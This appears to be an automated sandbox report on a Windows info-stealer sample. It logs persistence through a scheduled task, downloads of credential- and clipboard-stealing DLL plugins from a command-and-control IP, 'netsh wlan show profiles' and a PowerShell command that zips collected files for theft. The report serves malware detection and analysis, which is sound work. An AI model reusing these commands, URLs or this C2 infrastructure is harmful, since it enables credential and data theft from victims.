Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.56
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E1D8D0 recv,recv,recv,recv, 0_2_00E1D8D0
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: unknown HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/
Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/CoreCommonProxyStub.dll
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.3041565537.0000000000C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dll
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/clip64.dllv
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/Plugins/cred64.dll
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2440652752.00000256D1295000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3037845134.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php
Source: rundll32.exe, 00000008.00000002.2440652752.00000256D1295000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php-
Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php2
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php27
Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php3
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php6
Source: rundll32.exe, 00000008.00000002.2440937016.00000256D313A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1
Source: rundll32.exe, 00000008.00000002.2440652752.00000256D1263000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1;BU)(A;OICI;GXGR;;;WD)D
Source: rundll32.exe, 00000008.00000002.2440937016.00000256D313A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.php?wal=1s
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpd
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C75000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpded
Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpg
Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/Pneh2sXQk0/index.phpk
Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/ferences.SourceAumid
Source: explorha.exe, 00000006.00000002.3041565537.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.56/l
Source: powershell.exe, 0000000C.00000002.2422508148.000001A3CB17A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB111000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC6E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC740000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000C.00000002.2404276888.000001A3BB339000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000C.00000002.2422508148.000001A3CB17A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2404276888.000001A3BC9E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

System Summary
barindex
PE file contains section with special chars
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name:
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0087E227 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_0087E227
Creates files inside the system directory
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E15DC8 0_2_00E15DC8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E5A220 0_2_00E5A220
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E14E60 0_2_00E14E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_008AA220 1_2_008AA220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_008A4330 1_2_008A4330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_008994E3 1_2_008994E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_008A8DBB 1_2_008A8DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_008A8EDB 1_2_008A8EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_008A8669 1_2_008A8669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00864E60 1_2_00864E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_008A47C8 1_2_008A47C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_008AA220 2_2_008AA220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_008A4330 2_2_008A4330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_008994E3 2_2_008994E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_008A8DBB 2_2_008A8DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_008A8EDB 2_2_008A8EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_008A8669 2_2_008A8669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00864E60 2_2_00864E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_008A47C8 2_2_008A47C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008AA220 6_2_008AA220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008A4330 6_2_008A4330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00885481 6_2_00885481
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008824A3 6_2_008824A3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008994E3 6_2_008994E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00989680 6_2_00989680
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008A8669 6_2_008A8669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008A47C8 6_2_008A47C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00887822 6_2_00887822
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00882C92 6_2_00882C92
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008A8DBB 6_2_008A8DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_008A8EDB 6_2_008A8EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00864E60 6_2_00864E60
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll 3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll 12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: String function: 00E29750 appears 122 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 0089A433 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 0087ECE3 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 0087F620 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 0087EFE2 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00879750 appears 367 times
Uses 32bit PE files
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Static PE information: Section: ZLIB complexity 0.9981358914209115
Source: explorha.exe.0.dr Static PE information: Section: ZLIB complexity 0.9981358914209115
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@17/21@0/1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: cred64[1].dll.6.dr, cred64.dll.6.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64[1].dll.6.dr, cred64.dll.6.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64[1].dll.6.dr, cred64.dll.6.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64[1].dll.6.dr, cred64.dll.6.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64[1].dll.6.dr, cred64.dll.6.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64[1].dll.6.dr, cred64.dll.6.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: rundll32.exe, 00000008.00000002.2440652752.00000256D11F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: cred64[1].dll.6.dr, cred64.dll.6.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe ReversingLabs: Detection: 44%
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Virustotal: Detection: 54%
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe String found in binary or memory: %RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeR
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll Jump to behavior
